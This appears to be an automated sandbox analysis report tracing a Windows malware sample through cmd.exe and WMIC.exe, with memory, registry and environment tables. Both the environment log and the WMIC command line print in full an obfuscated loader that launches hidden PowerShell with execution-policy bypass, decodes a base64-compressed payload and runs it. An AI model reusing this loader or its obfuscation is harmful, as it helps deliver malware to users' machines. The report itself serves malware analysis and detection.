1 | |
| Get Environment String | name = vF, result_out = s hidDe |
|
1 | |
| Get Environment String | name = uUH, result_out = n ^& ( |
|
1 | |
| Get Environment String | name = vZc, result_out = $pS |
|
1 | |
| Get Environment String | name = aXch, result_out = HoMe |
|
1 | |
| Get Environment String | name = PdJ6, result_out = [21]+$Ps |
|
1 | |
| Get Environment String | name = Lb, result_out = hoME[34]+ |
|
1 | |
| Get Environment String | name = Zb, result_out = 'X |
|
1 | |
| Get Environment String | name = R5qC, result_out = ')( |
|
1 | |
| Get Environment String | name = Z13, result_out = ""\""(n |
|
1 | |
| Get Environment String | name = j1, result_out = Ew-object Io.cOMp |
|
1 | |
| Get Environment String | name = xS, result_out = ressi |
|
1 | |
| Get Environment String | name = eZP, result_out = o |
|
1 | |
| Get Environment String | name = az8, result_out = N.DefLatesTR |
|
1 | |
| Get Environment String | name = U19, result_out = ea |
|
1 | |
| Get Environment String | name = b1, result_out = M( |
|
1 | |
| Get Environment String | name = AN, result_out = [sysTem.IO.ME |
|
1 | |
| Get Environment String | name = Sq5s, result_out = MoRYSTREam] [COnvER |
|
1 | |
| Get Environment String | name = JGA, result_out = T]:: |
|
1 | |
| Get Environment String | name = LK, result_out = fRomba |
|
1 | |
| Get Environment String | name = UQ7k, result_out = se64sTrIN |
|
1 | |
| Get Environment String | name = JFO6, result_out = G('VZBba8IwGIb/SpAOEremtR5Aix |
|
1 | |
| Get Environment String | name = bv, result_out = faqfNGZQoblCJp |
|
1 | |
| Get Environment String | name = us6, result_out = +00z |
|
1 | |
| Get Environment String | name = cwH, result_out = kqa02Wx1/vfFwy52+7zfe+ |
|
1 | |
| Get Environment String | name = cWSV, result_out = ArmU |
|
1 | |
| Get Environment String | name = CdJ, result_out = Ap |
|
1 | |
| Get Environment String | name = GY, result_out = CAC0gIO |
|
1 | |
| Get Environment String | name = q0Cc, result_out = 9 |
|
1 | |
| Get Environment String | name = eyWN, result_out = jD8h |
|
1 | |
| Get Environment String | name = ZHTE, result_out = 0f |
|
1 | |
| Get Environment String | name = G1yS, result_out = 4oTe1Nn |
|
1 | |
| Get Environment String | name = ep3A, result_out = QOyR2UJM |
|
1 | |
| Get Environment String | name = ir1V, result_out = h |
|
1 | |
| Get Environment String | name = l6e, result_out = b1 |
|
1 | |
| Get Environment String | name = Zzt, result_out = gklAj |
|
1 | |
| Get Environment String | name = BW7, result_out = XV |
|
1 | |
| Get Environment String | name = LIj, result_out = dapD0 |
|
1 | |
| Get Environment String | name = aMG, result_out = u |
|
1 | |
| Get Environment String | name = I1, result_out = WAHnu0avhWw4c38X6 |
|
1 | |
| Get Environment String | name = J6, result_out = FjriXLMf5 |
|
1 | |
| Get Environment String | name = cNVz, result_out = L1 |
|
1 | |
| Get Environment String | name = Cij, result_out = vQN |
|
1 | |
| Get Environment String | name = baCI, result_out = 4kBwy |
|
1 | |
| Get Environment String | name = OE9Q, result_out = DShyxyyV2Apbuy |
|
1 | |
| Get Environment String | name = JZ, result_out = 1z |
|
1 | |
| Get Environment String | name = DG, result_out = suB4 |
|
1 | |
| Get Environment String | name = qXu, result_out = 3DJdlB6lMtdrCqaKOl0P |
|
1 | |
| Get Environment String | name = Ef, result_out = aftOsH05 |
|
1 | |
| Get Environment String | name = xdNR, result_out = bg8rj |
|
1 | |
| Get Environment String | name = gI, result_out = pbRXNTS |
|
1 | |
| Get Environment String | name = 3y, result_out = Ihv |
|
1 | |
| Get Environment String | name = Sl, result_out = QVHcO8e1hjBCXsd1fexS2i |
|
1 | |
| Get Environment String | name = dn, result_out = Y/D6 |
|
1 | |
| Get Environment String | name = 72, result_out = cPV |
|
1 | |
| Get Environment String | name = H8O, result_out = QBL9tiqEM8utN |
|
1 | |
| Get Environment String | name = q8, result_out = vv |
|
1 | |
| Get Environment String | name = u5, result_out = E3Kyvr/E |
|
1 | |
| Get Environment String | name = sHnp, result_out = 0My |
|
1 | |
| Get Environment String | name = awyI, result_out = l |
|
1 | |
| Get Environment String | name = cLM, result_out = M9ArXoEw |
|
1 | |
| Get Environment String | name = 0zSA, result_out = B0/W9pYXWttmz3UfrSoa |
|
1 | |
| Get Environment String | name = Op1, result_out = 4 |
|
1 | |
| Get Environment String | name = Dq4G, result_out = lAyvY8Gg6lQqsD4YqRjO |
|
1 | |
| Get Environment String | name = Rw, result_out = 2ZZ2 |
|
1 | |
| Get Environment String | name = rY, result_out = uqSZqtH7Njw |
|
1 | |
| Get Environment String | name = zRJ, result_out = K5 |
|
1 | |
| Get Environment String | name = gVkp, result_out = 6 |
|
1 | |
| Get Environment String | name = bC0, result_out = hK |
|
1 | |
| Get Environment String | name = 3B, result_out = 0dGIOe |
|
1 | |
| Get Environment String | name = ag, result_out = zP |
|
1 | |
| Get Environment String | name = 6rHY, result_out = 5+8 |
|
1 | |
| Get Environment String | name = CY, result_out = 4 |
|
1 | |
| Get Environment String | name = Mt, result_out = /D+iA1Umk6yRKXmH |
|
1 | |
| Get Environment String | name = Eau, result_out = S |
|
1 | |
| Get Environment String | name = Eh, result_out = ZttA |
|
1 | |
| Get Environment String | name = eq, result_out = 7 |
|
1 | |
| Get Environment String | name = Je, result_out = m8 |
|
1 | |
| Get Environment String | name = q2, result_out = 0v5W |
|
1 | |
| Get Environment String | name = xm, result_out = h |
|
1 | |
| Get Environment String | name = CoJf, result_out = e |
|
1 | |
| Get Environment String | name = zR, result_out = G4GutW |
|
1 | |
| Get Environment String | name = HJVR, result_out = ee57 |
|
1 | |
| Get Environment String | name = mLwq, result_out = U5EyC8=')""\"" + |
|
1 | |
| Get Environment String | name = lPo, result_out = ([ChAr]44).ToSTRIng |
|
1 | |
| Get Environment String | name = i8T3, result_out = ( |
|
1 | |
| Get Environment String | name = bn, result_out = ) + ""\""[IO |
|
1 | |
| Get Environment String | name = OZ, result_out = .CoMpRES |
|
1 | |
| Get Environment String | name = gBQ, result_out = si |
|
1 | |
| Get Environment String | name = Ir, result_out = ON.COmPR |
|
1 | |
| Get Environment String | name = DvI, result_out = ESsIo |
|
1 | |
| Get Environment String | name = VDG, result_out = NM |
|
1 | |
| Get Environment String | name = JVw, result_out = odE |
|
1 | |
| Get Environment String | name = uqLY, result_out = ]::dEC |
|
1 | |
| Get Environment String | name = lVp, result_out = OmPreSs ) |
|
1 | |
| Get Environment String | name = GU, result_out = ^| |
|
1 | |
| Get Environment String | name = LI, result_out = foREach- |
|
1 | |
| Get Environment String | name = 3MK1, result_out = objECt{nEw-obje |
|
1 | |
| Get Environment String | name = 0A, result_out = ct SYsTEM |
|
1 | |
| Get Environment String | name = qG, result_out = .I |
|
1 | |
| Get Environment String | name = bOq, result_out = o.stReAMREADeR |
|
1 | |
| Get Environment String | name = cI, result_out = ( `$_""\"" |
|
1 | |
| Get Environment String | name = Xj, result_out = + |
|
1 | |
| Get Environment String | name = 3RY, result_out = ([ChAr]44) |
|
1 | |
| Get Environment String | name = bIHe, result_out = .ToST |
|
1 | |
| Get Environment String | name = cOyd, result_out = RIng() |
|
1 | |
| Get Environment String | name = hg, result_out = + ""\""[systEM.t |
|
1 | |
| Get Environment String | name = lR, result_out = Ext.eNcO |
|
1 | |
| Get Environment String | name = dv, result_out = D |
|
1 | |
| Get Environment String | name = rp, result_out = iNG]::aSC |
|
1 | |
| Get Environment String | name = qX, result_out = iI) |
|
1 | |
| Get Environment String | name = olr8, result_out = } |
|
1 | |
| Get Environment String | name = oJV, result_out = ^| fOR |
|
1 | |
| Get Environment String | name = A2, result_out = EacH-obj |
|
1 | |
| Get Environment String | name = cnih, result_out = E |
|
1 | |
| Get Environment String | name = IG4Q, result_out = CT |
|
1 | |
| Get Environment String | name = 8i47, result_out = {`$_ |
|
1 | |
| Get Environment String | name = c2Q, result_out = .rEadToend() }) |
|
1 | |
| Get Environment String | name = 3Che, result_out = ^| |
|
1 | |
| Get Environment String | name = OcWL, result_out = ^&( `$ |
|
1 | |
| Get Environment String | name = oP8, result_out = p |
|
1 | |
| Get Environment String | name = DQ, result_out = sHOMe |
|
1 | |
| Get Environment String | name = bHT, result_out = [ |
|
1 | |
| Get Environment String | name = ID, result_out = 21]+ |
|
1 | |
| Get Environment String | name = e5S, result_out = `$PSHOME[30]+'x')""\"" |
|
1 | |
| Get Environment String | name = pv, result_out = ) "" |
|
1 | |
| Get Environment String | name = pVZ, result_out = "" |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #5: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | cmd , , /r ,%q4j:""="% |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:26, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xae4 |
| Parent PID | 0xadc (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AE8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003f0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x00677fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000680000 | 0x00680000 | 0x00800fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000810000 | 0x00810000 | 0x01c0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001c10000 | 0x01c10000 | 0x01f52fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f60000 | 0x0222efff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x49d50000 | 0x49da8fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| winbrand.dll | 0x7fee6880000 | 0x7fee6887fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefdd60000 | 0x7fefddcafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7fefdf60000 | 0x7fefdfc6fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefed60000 | 0x7fefed8dfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7feff1e0000 | 0x7feff2e8fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7feff4d0000 | 0x7feff598fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff5a0000 | 0x7feff63efff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7feff860000 | 0x7feff86dfff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7fefff60000 | 0x7fefff60fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd8000 | 0x7fffffd8000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
File (10)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
2 | |
| Get Info | WMIC.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
5 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 24, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\System32\Wbem\WMIC.exe | os_pid = 0xaec, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\cmd.exe | base_address = 0x49d50000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x77b20000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadUILanguage, address_out = 0x77b36d40 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileExW, address_out = 0x77b323d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsDebuggerPresent, address_out = 0x77b28290 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x77b317e0 |
|
1 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-01 09:27:45 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 137514 |
|
1 |
Environment (18)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = q4j, result_out = WMIC.exe pRoCESs 'CAll' 'cReAte' ""poWerSHell -NOniNtErac -noPROFIlE -NoLogO -ExECUt bYpaSS -wINDOws hidDen & ( $pSHoMe[21]+$PshoME[34]+'X')( ""\""(nEw-object Io.cOMpressioN.DefLatesTReaM([sysTem.IO.MEMoRYSTREam] [COnvERT]::fRombase64sTrING('VZBba8IwGIb/SpAOEremtR5AixfaqfNGZQoblCJp+00zkqa02Wx1/vfFwy52+7zfe+ArmUApCAC0gIO9jD8h0f4oTe1NnQOyR2UJMhb1gklAjXVdapD0uWAHnu0avhWw4c38X6FjriXLMf5L1vQN4kBwyDShyxyyV2Apbuy1zsuB43DJdlB6lMtdrCqaKOl0PaftOsH05bg8rjpbRXNTSIhvQVHcO8e1hjBCXsd1fexS2iY/D6cPVQBL9tiqEM8utNvvE3Kyvr/E0MylM9ArXoEwB0/W9pYXWttmz3UfrSoa4lAyvY8Gg6lQqsD4YqRjO2ZZ2uqSZqtH7NjwK56hK0dGIOezP5+84/D+iA1Umk6yRKXmHSZttA7m80v5WheG4GutWee57U5EyC8=')""\"" + ([ChAr]44).ToSTRIng() + ""\""[IO.CoMpRESsiON.COmPRESsIoNModE]::dECOmPreSs ) | foREach-objECt{nEw-object SYsTEM.Io.stReAMREADeR( `$_""\"" + ([ChAr]44).ToSTRIng() + ""\""[systEM.tExt.eNcODiNG]::aSCiI)}| fOREacH-objECT {`$_.rEadToend() })| &( `$psHOMe[21]+`$PSHOME[30]+'x')""\"" ) "" |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #6: wmic.exe
22
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\windows\system32\wbem\wmic.exe |
| Command Line | WMIC.exe pRoCESs 'CAll' 'cReAte' "poWerSHell -NOniNtErac -noPROFIlE -NoLogO -ExECUt bYpaSS -wINDOws hidDen & ( $pSHoMe[21]+$PshoME[34]+'X')( "\"(nEw-object Io.cOMpressioN.DefLatesTReaM([sysTem.IO.MEMoRYSTREam] [COnvERT]::fRombase64sTrING('VZBba8IwGIb/SpAOEremtR5AixfaqfNGZQoblCJp+00zkqa02Wx1/vfFwy52+7zfe+ArmUApCAC0gIO9jD8h0f4oTe1NnQOyR2UJMhb1gklAjXVdapD0uWAHnu0avhWw4c38X6FjriXLMf5L1vQN4kBwyDShyxyyV2Apbuy1zsuB43DJdlB6lMtdrCqaKOl0PaftOsH05bg8rjpbRXNTSIhvQVHcO8e1hjBCXsd1fexS2iY/D6cPVQBL9tiqEM8utNvvE3Kyvr/E0MylM9ArXoEwB0/W9pYXWttmz3UfrSoa4lAyvY8Gg6lQqsD4YqRjO2ZZ2uqSZqtH7NjwK56hK0dGIOezP5+84/D+iA1Umk6yRKXmHSZttA7m80v5WheG4GutWee57U5EyC8=')"\" + ([ChAr]44).ToSTRIng() + "\"[IO.CoMpRESsiON.COmPRESsIoNModE]::dECOmPreSs ) | foREach-objECt{nEw-object SYsTEM.Io.stReAMREADeR( `$_"\" + ([ChAr]44).ToSTRIng() + "\"[systEM.tExt.eNcODiNG]::aSCiI)}| fOREacH-objECT {`$_.rEadToend() })| &( `$psHOMe[21]+`$PSHOME[30]+'x')"\" ) " |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:27, Reason: Child Process |
| Unmonitor | End Time: 00:01:32, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xaec |
| Parent PID | 0xae4 (c:\windows\system32\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
AF0
0x
AF4
0x
AF8
0x
AFC
0x
B00
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c6fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000000d0000 | 0x000d0000 | 0x000d1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| wmic.exe.mui | 0x000e0000 | 0x000effff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000000f0000 | 0x000f0000 | 0x000f0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000100000 | 0x00100000 | 0x00100fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00110fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| msxml3r.dll | 0x001b0000 | 0x001b0fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001dffff | Private Memory | - |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e1fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x001f0000 | 0x001f0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000200000 | 0x00200000 | 0x00201fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x00210000 | 0x0021bfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000220000 | 0x00220000 | 0x0031ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x00320000 | 0x0039cfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x00320000 | 0x00327fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000330000 | 0x00330000 | 0x003affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x004bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004c0000 | 0x004c0000 | 0x00647fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000650000 | 0x00650000 | 0x007d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007e0000 | 0x007e0000 | 0x01bdffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001be0000 | 0x01be0000 | 0x01c6ffff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x01be0000 | 0x01beffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000001bf0000 | 0x01bf0000 | 0x01c6ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001c70000 | 0x01c70000 | 0x01c72fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001c80000 | 0x01c80000 | 0x01cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001d00000 | 0x01d00000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001d00000 | 0x01d00000 | 0x01d23fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001d00000 | 0x01d00000 | 0x01d01fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001d40000 | 0x01d40000 | 0x01dbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001dd0000 | 0x01dd0000 | 0x01e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e60000 | 0x01e60000 | 0x01edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ee0000 | 0x01ee0000 | 0x01f5ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01f60000 | 0x0222efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002230000 | 0x02230000 | 0x023affff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x02230000 | 0x022effff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000002330000 | 0x02330000 | 0x023affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000023b0000 | 0x023b0000 | 0x0251ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000023b0000 | 0x023b0000 | 0x0248efff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000024a0000 | 0x024a0000 | 0x0251ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002550000 | 0x02550000 | 0x025cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000025d0000 | 0x025d0000 | 0x029cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029d0000 | 0x029d0000 | 0x02bdffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x029d0000 | 0x02a14fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002a10000 | 0x02a10000 | 0x02a8ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a90000 | 0x02a90000 | 0x02b0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002b60000 | 0x02b60000 | 0x02bdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c80000 | 0x02c80000 | 0x02cfffff | Private Memory | rw |
|
|
|
- |
| user32.dll | 0x77a20000 | 0x77b19fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77b20000 | 0x77c3efff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
